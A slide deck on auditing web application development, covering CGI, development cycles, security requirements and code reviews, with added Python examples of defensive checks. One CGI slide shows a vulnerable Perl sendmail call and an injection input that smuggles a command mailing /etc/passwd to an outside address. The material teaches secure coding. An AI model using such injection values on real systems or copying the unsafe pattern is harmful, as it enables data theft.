Auditing the Development of
Web-Based Applications
Jian Zhen
Overview
 Overview of WWW and HTTP
 Web-based Application Concepts
 Overview of the Development Cycles
 Security Requirements
 Web-based Application Security
 Application Code Reviews
World-Wide-Web (WWW)
 Invented by Tim Berners-Lee and others at
the European Laboratory for Particle
Physics (CERN)
 Based on hypertext--a system of
embedding links in text to link to other text
 The most popular way of linking to
resources on the Internet
WWW (Cont.)
 Hundreds of millions of pages indexed by
search engines
 Tens of terabytes archived by Alexa
 Hundreds of millions of users on the Web
WWW and HTTP
 Static Web Model (diagram: Web Browser and Web Server)
• Browser sends a request to the server at port 80
• Server sends the response and closes the connection
• 2nd request
• 2nd response and close
Common Gateway Interface (CGI)
 Common
• An open specification
• Many languages
 Gateway
• Strength is not in what it does by itself
• Methods to access other systems
 Interface
• Well defined way to call features
CGI (cont.)
 A way of providing dynamic web content
• Forms
• Counters
• Guest Books
• Database Queries
 Used by most of the web-based
applications
The CGI Model (diagram: Browser Desktop, Internet, Web Server, CGI Process on the Web Server)
1. HTTP Request
2. CGI Started, Input passed to CGI process
3. CGI hands back output
4. Output Returns to the browser
Web Applications (diagram)
Browsers:
• Plug-ins
• Applets
• DHTML
• etc
Internet
Server:
• CGI
• Servlets
• ASP
• NSAPI
CORBA/ODBC
Database
Static Pages
Web Applications
 Client side
• HTML/DHTML
• JavaScript, VBScript, PerlScript
• Java
• ActiveX
• Plug-ins
Web Applications
 Server side
• Frontend: CGIs (Perl, C/C++), Java Servlets,
ISAPI, NSAPI, ASP, etc
• Middleware: CORBA, ODBC, DCOM, etc
• Backend: Oracle, Informix, Sybase, DB2, etc
Web Applications
 Complex, distributed client/server
applications
 Many elements involved and integrated
 Rapid development
 Requires more planning, design, and
control than “conventional” projects.
Web Development Cycles
Analysis
Design
Prototyping
Implementation
Testing
Web Development Cycles
 Analysis
• Feasibility study
• Identify requirements
• Involvement: your requirements
Web Development Cycles
 Design
• Design specifications
• Involvement: system interoperability, resiliency,
capacity planning, mature technologies,
security design
Design Specification
 Business Requirement
 Existing and Proposed System Overview
 Hardware and Software Requirements
 System Schematic
 System Interoperability
 Operational cycle/Workflow
 System Modules
 Input-Output
 User Interface
 Prototypes
Web Development Cycles
 Prototyping
• Most time-consuming stage
• Coding
• Build, review, and refine prototype
• Involvement: coding standards, effective
application development environment
Web Development Cycles
 Testing
• Unit/System test plans
• Module/Unit testing
• System integration testing
• Involvement: test plans, effective testing
environment, testing stages, code reviews
Web Development Cycles
 Delivery/Implementation
• Install systems
• Train users
• Acceptance testing
• Involvement: effective implementation
Security Requirements
 Privacy - All user information is protected
 Authentication/Access Control - Only
authorized users are allowed to access the
resources
 Integrity - User and application data cannot
be tampered with
 Auditing - Keeping audit logs and audit
trails and ensuring their integrity
Privacy
 Protecting users’ private information
• SSN
• Birthdates
• Employee Ids
• Passwords
 Technologies
• Encryption: DES, RSA, SSL
• Local vs. Network
Authentication
 Proof of Identity
 Required to enforce access control and
accountability, and achieve nonrepudiation
 Technologies
• username/password
• Smart Cards, SecurID
• Biometrics
Access Control
 Determine who is authorized to receive or
modify information
 Common mechanisms
• Mandatory Access Control (MAC)
– Owners cannot modify access list (SeOS)
• Discretionary Access Control (DAC)
– Owners are allowed to modify access (UNIX)
• Role-based Access Control (RBAC)
– Role granted provides necessary access
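The three models on this slide, written out as small deny-by-default checks. This is an added example, not code from the slides: the users, file names, the SECURITY_OFFICER principal and the permission strings are constructed sample data, and one shared ACL table is used for both the DAC and MAC grant functions only to keep the demonstration short (a real system runs one model).

```python
# Added example: MAC, DAC and RBAC as deny-by-default checks over constructed data.
# All principals, resources and permission names below are hypothetical.

SECURITY_OFFICER = "secoff"          # under MAC, the only principal who may edit an ACL

# resource -> owner (constructed)
OWNERS = {"/payroll.db": "alice", "/notes.txt": "bob"}

# resource -> {user: set of operations} (constructed)
ACL = {
    "/payroll.db": {"alice": {"read", "write"}},
    "/notes.txt": {"bob": {"read", "write"}, "alice": {"read"}},
}

# RBAC tables: role -> permissions it grants, user -> roles held (constructed)
ROLE_PERMS = {"clerk": {"payroll:read"},
              "manager": {"payroll:read", "payroll:write"}}
USER_ROLES = {"alice": {"manager"}, "bob": {"clerk"}, "carol": set()}


def acl_allows(user, resource, op):
    """Deny by default: only an explicit ACL entry grants the operation."""
    return op in ACL.get(resource, {}).get(user, set())


def dac_grant(actor, resource, user, op):
    """DAC: the resource owner may change its access list (as with UNIX chmod).
    Returns True if the change was applied."""
    if OWNERS.get(resource) != actor:
        return False
    ACL.setdefault(resource, {}).setdefault(user, set()).add(op)
    return True


def mac_grant(actor, resource, user, op):
    """MAC: owners cannot change the access list; only the security officer can."""
    if actor != SECURITY_OFFICER:
        return False
    ACL.setdefault(resource, {}).setdefault(user, set()).add(op)
    return True


def rbac_allows(user, permission):
    """RBAC: access follows from the roles granted to the user, never from
    per-user entries. An unknown user or a user with no roles gets nothing."""
    granted = set()
    for role in USER_ROLES.get(user, set()):
        granted |= ROLE_PERMS.get(role, set())
    return permission in granted
```

The point an auditor looks for is in the `.get(..., set())` defaults: a missing entry, an unknown user or an unknown role yields no access rather than an exception path that some caller might treat as success.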
Auditing
 The process of collecting and recording
security-relevant activities on a system
 After-the-fact technique
 Audit logs are used as evidence
Data Encryption
 Confidentiality
• Scrambling data to unreadable format
 Integrity
• User and application data are not modified
 Technologies
• Public/Secret Key Encryption: RSA, DES
• Digital Signatures: DSS
• Hashes: MD5
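The Auditing slide asks that audit trails have their integrity ensured, and this slide lists hashes as one of the tools. The following added example (not from the slides) chains each log entry to the previous one with a keyed hash so that editing, inserting or deleting an entry breaks the chain. It uses HMAC with SHA-256 rather than the MD5 named on the slide, because an unkeyed MD5 over an entry can be recomputed by whoever altered it; the key, the timestamps and the events are constructed.

```python
import hashlib
import hmac
import json

# Constructed demo key. In service the key belongs to the audit subsystem, not to
# the web application that writes entries, so a compromised CGI process cannot
# re-tag entries it has altered.
AUDIT_KEY = b"demo-audit-key-not-for-production"
GENESIS = "0" * 64                      # tag "before" the first entry


def _tag(prev_tag, event):
    """HMAC-SHA256 over (previous tag || canonical JSON of the event)."""
    body = json.dumps(event, sort_keys=True, separators=(",", ":"))
    return hmac.new(AUDIT_KEY, (prev_tag + body).encode(), hashlib.sha256).hexdigest()


def append_entry(log, event):
    """Append `event` to `log` (a list of dicts), chained to the last tag."""
    prev = log[-1]["tag"] if log else GENESIS
    entry = {"event": dict(event), "tag": _tag(prev, event)}
    log.append(entry)
    return entry["tag"]


def verify_log(log, last_known_tag=None):
    """Recompute the chain. Returns -1 if intact, else the index of the first
    entry that fails. If the newest tag was also stored out of band
    (`last_known_tag`), truncation of the tail is reported as index len(log)."""
    prev = GENESIS
    for i, entry in enumerate(log):
        if not hmac.compare_digest(_tag(prev, entry["event"]), entry["tag"]):
            return i
        prev = entry["tag"]
    if last_known_tag is not None and not hmac.compare_digest(prev, last_known_tag):
        return len(log)
    return -1


def demo():
    """Write three constructed entries, then alter one and drop the tail."""
    log = []
    append_entry(log, {"ts": "1999-05-01T10:00:00Z", "user": "alice", "action": "login", "result": "ok"})
    append_entry(log, {"ts": "1999-05-01T10:02:13Z", "user": "alice", "action": "read", "object": "/payroll.db"})
    latest = append_entry(log, {"ts": "1999-05-01T10:05:40Z", "user": "bob", "action": "login", "result": "fail"})
    intact = verify_log(log, latest)             # -1: chain verifies
    log[2]["event"]["result"] = "ok"             # rewrite a failed login as a success
    edited = verify_log(log, latest)             # 2: the edited entry no longer verifies
    del log[2]                                   # remove the entry altogether
    truncated = verify_log(log, latest)          # 2: tail missing, caught by last_known_tag
    return intact, edited, truncated
```

The chain alone cannot detect removal of the newest entries; that is why `verify_log` accepts the last tag from a separate store (a write-once medium, another host, or a periodic signature over the latest tag).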
Web-based Application Security
 Security flaws occur when software bugs
allow violation of security policy
 Different security flaw present different
threats
• Opening backdoors
• Stealing information or system resource
• Destroying or tampering with data
Where Do Flaws Exist?
 Operating Systems
• UNIX, NT
 Support Software and Libraries
• Compilers, C Libraries
 Applications
• CGI programs, Netscape, Internet Explorer, vi,
Emacs, Sendmail, many others
Web-based Application Security
 Different layers of security
• Network security
• Operating System security
• Web server security
• Application security
 MUST PROTECT ALL LAYERS!!!
• Rootshell gets defaced!
Web-based Application Security
 Common Security Flaws
• Insufficient Input Validations
• Memory Cleansing, i.e. Cookie deletion on the
client
• Environmental Faults
• Buffer Overflows
• Race Conditions
Web-based Application Security
 CGI Programming Example
 What if we used this Perl code to send mail
to an address given in a fill-out form?
$mail_to = &get_name_from_input; # read the address from the form (sub not shown)
open (MAIL, "| /usr/lib/sendmail $mail_to");
print MAIL "To: $mail_to\nFrom: me\n\nHello\n";
close MAIL;
CGI Example (cont.)
 Look at the open() call
open (MAIL, "| /usr/lib/sendmail $mail_to");
 What if the user entered
jerk@nowhere.com;mail evilone@chaos.org</etc/passwd;
 Look at the open again!
/usr/lib/sendmail jerk@nowhere.com; mail evilone@chaos.org</etc/passwd;
Web-based Application Security
 Never Assume That:
• The input to a field from a selection list will be
one of the items on the list
• A browser will never send more than the
maximum length of an input field
• The field in the QUERY_STRING variable will
match the ones on the page
• The QUERY_STRING variable will correspond to
something that is within valid HTTP specs
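Each "never assume" bullet above is a check the server must make itself. The following added example (not code from the slides) validates a QUERY_STRING against a description of the form the page actually offers: the field names, the option list, the maxlength, and a numeric format. The form schema, field names and error messages are constructed for the demonstration.

```python
import re
from urllib.parse import parse_qs

# Constructed description of one fill-out form: the fields the page offers and
# the constraints its HTML claims (option list, maxlength, a numeric field).
FORM_SCHEMA = {
    "color":   {"choices": {"red", "green", "blue"}},   # a <select> list
    "comment": {"maxlen": 80},                          # <input maxlength=80>
    "qty":     {"pattern": r"[0-9]{1,3}"},              # 1 to 3 digits
}


def validate_query(query_string, schema=FORM_SCHEMA):
    """Check a QUERY_STRING against the form description on the server side.

    Returns (values, errors). The request may be processed only when errors is
    empty; nothing the browser 'should' have enforced is trusted.
    """
    errors = []
    try:
        # strict_parsing rejects pairs without '='; max_num_fields bounds the
        # number of fields a client may send regardless of the page's form.
        parsed = parse_qs(query_string, keep_blank_values=True,
                          strict_parsing=True, max_num_fields=2 * len(schema))
    except ValueError as exc:
        return {}, [f"malformed query string: {exc}"]

    values = {}
    for name, sent in parsed.items():
        if name not in schema:                       # field that is not on the page
            errors.append(f"unexpected field {name!r}")
            continue
        if len(sent) != 1:                           # same field sent twice
            errors.append(f"field {name!r} sent more than once")
            continue
        value, rule = sent[0], schema[name]
        if "choices" in rule and value not in rule["choices"]:
            errors.append(f"field {name!r}: {value!r} is not one of the offered choices")
        elif "maxlen" in rule and len(value) > rule["maxlen"]:
            errors.append(f"field {name!r}: longer than maxlength {rule['maxlen']}")
        elif "pattern" in rule and re.fullmatch(rule["pattern"], value) is None:
            errors.append(f"field {name!r}: does not match expected format")
        else:
            values[name] = value

    for name in schema:                              # every field on the page must arrive
        if name not in parsed:
            errors.append(f"missing field {name!r}")
    return values, errors
```

Only the validated `values` dictionary should be passed on to the rest of the program; the raw query string and the parsed map are discarded once checked.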
Web-based Application Security
 AVOID shell programming!
 Always use full pathnames for both
commands and filenames, or explicitly set
the PATH variable
 Don’t depend on the current directory
 Use and check all return codes from
system calls
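The CGI mail example from the earlier slides, reworked along the lines of this slide: no shell, a full pathname for the mail program, the recipient checked against an allow-list grammar before use, and the exit status checked. This is an added example in Python rather than the slides' Perl and is not the author's code; the sendmail path is the one the slides use, `-oi` is sendmail's standard "do not stop at a lone dot" option, and `dry_run` is a hypothetical stand-in so the function can be exercised without a mailer.

```python
import re
import subprocess

# Full path, as the slide advises, instead of relying on PATH (taken from the
# slides' example; adjust for the host).
SENDMAIL = "/usr/lib/sendmail"

# Conservative address grammar: local part and dotted domain drawn from a small
# character set, so whitespace and shell metacharacters (';', '|', '<') are
# rejected outright.
ADDRESS_RE = re.compile(
    r"[A-Za-z0-9][A-Za-z0-9._+-]{0,63}@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")


def unsafe_command_line(mail_to):
    """The slides' pattern, transcribed for contrast only: the address is spliced
    into a shell command line, so ';' or '<' inside it become shell syntax."""
    return f"| {SENDMAIL} {mail_to}"


def valid_address(mail_to):
    """Allow-list check: True only if the whole string matches the grammar."""
    return ADDRESS_RE.fullmatch(mail_to) is not None


def sendmail_argv(mail_to):
    """Argument vector for sendmail. With no shell involved the address is one
    argv element whatever it contains, but it is still validated first."""
    if not valid_address(mail_to):
        raise ValueError("recipient address rejected by validation")
    return [SENDMAIL, "-oi", mail_to]


def dry_run(returncode=0):
    """Hypothetical stand-in for subprocess.run that reports `returncode`
    without executing anything (for demonstration and tests)."""
    def _run(argv, **kwargs):
        return subprocess.CompletedProcess(argv, returncode)
    return _run


def send_mail(mail_to, body, run=subprocess.run):
    """Send `body` to `mail_to` through sendmail and check the exit status.

    `run` defaults to subprocess.run called with an argv list (no shell=True);
    pass dry_run() to exercise the path without a mailer.
    """
    argv = sendmail_argv(mail_to)
    message = f"To: {mail_to}\nFrom: me\n\n{body}\n"
    completed = run(argv, input=message.encode(), capture_output=True)
    if completed.returncode != 0:            # "use and check all return codes"
        raise RuntimeError(f"sendmail failed with exit status {completed.returncode}")
    return completed.returncode
```

Two independent controls are at work: the argv list removes the shell, so metacharacters have no meaning, and the grammar check keeps unexpected input out of the mailer even if some later change reintroduces string interpolation.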
Web-based Application Security
 Have internal consistency checking code
 Include lots of logging
 Review publicly available programs
 Review error logs
 Make the critical portion of the program as
simple as possible
 Read through the code
Code Reviews
 Code Inspection
• Formal
 Walk Through
 Code Reading
• Informal
Code Reviews
 Code Inspection
• Formal code review
• Emphasis on defect detection, not correction
• Reviewers prepare beforehand
• Distinct roles are assigned
Code Reviews
 Walkthroughs
• Usually hosted and moderated by the author of
the design or code under review
• To improve the technical quality of a program
• Emphasize on error detection
Code Reviews
 Code Reading
• Read source code and look for errors
• Comment on design, style, readability,
maintainability, and efficiency
• Informal meetings
• Probably most common in web-based
application environment
Appendix
 The Ten Commandments for C
Programmers
The Ten Commandments for C
Programmers
 Thou shalt run lint frequently and study its
pronouncements with care, for verily its perception
and judgement oft exceed thine.
 Thou shalt not follow the NULL pointer, for chaos and
madness await thee at its end.
The Ten Commandments for C
Programmers (cont.)
 Thou shalt cast all function arguments to the
expected type if they are not of that type already, even
when thou art convinced that this is unnecessary,
lest they take cruel vengeance upon thee when thou
least expect it.
 If thy header files fail to declare the return types of
thy library functions, thou shalt declare them thyself
with the most meticulous care, lest grievous harm
befall thy program.
The Ten Commandments for C
Programmers (cont.)
 Thou shalt check the array bounds of all strings
(indeed, all arrays,) for surely where thou typest “foo”
someone someday shall type
“supercalifragilisticexpialidocious.”
 If a function be advertised to return an error code in
the event of difficulties, thou shalt check for that
code, yea, even though the checks triple the size of
thy code and produce aches in thy typing fingers, for
if thou thinkest “it cannot happen to me,” the gods
shall surely punish thee for thy arrogance.
The Ten Commandments for C
Programmers (cont.)
 Thou shalt study thy libraries and strive not to
reinvent them without cause, that thy code may be short
and readable and thy days pleasant and productive.
 Thou shalt make thy program’s purpose and structure
clear to thy fellow man by using the One True Brace
Style, even if thou likest it not, for thy creativity is
better used in solving problems than in creating
beautiful new impediments to understanding.
The Ten Commandments for C
Programmers (cont.)
 Thy external identifiers shall be unique in the first six
characters, though this harsh discipline be irksome and the
years of its necessity stretch before thee seemingly without
end, lest thou tear thy hair out and go mad on that fateful day
when thou desirest to make thy program run on an old
system.
 Thou shalt foreswear, renounce, and abjure the vile heresy
which claimeth that “All the world’s a VAX,” and have no
commerce with the benighted heathens who cling to this
barbarous belief, that the days of thy program may be long
even though the days of thy current machine be short.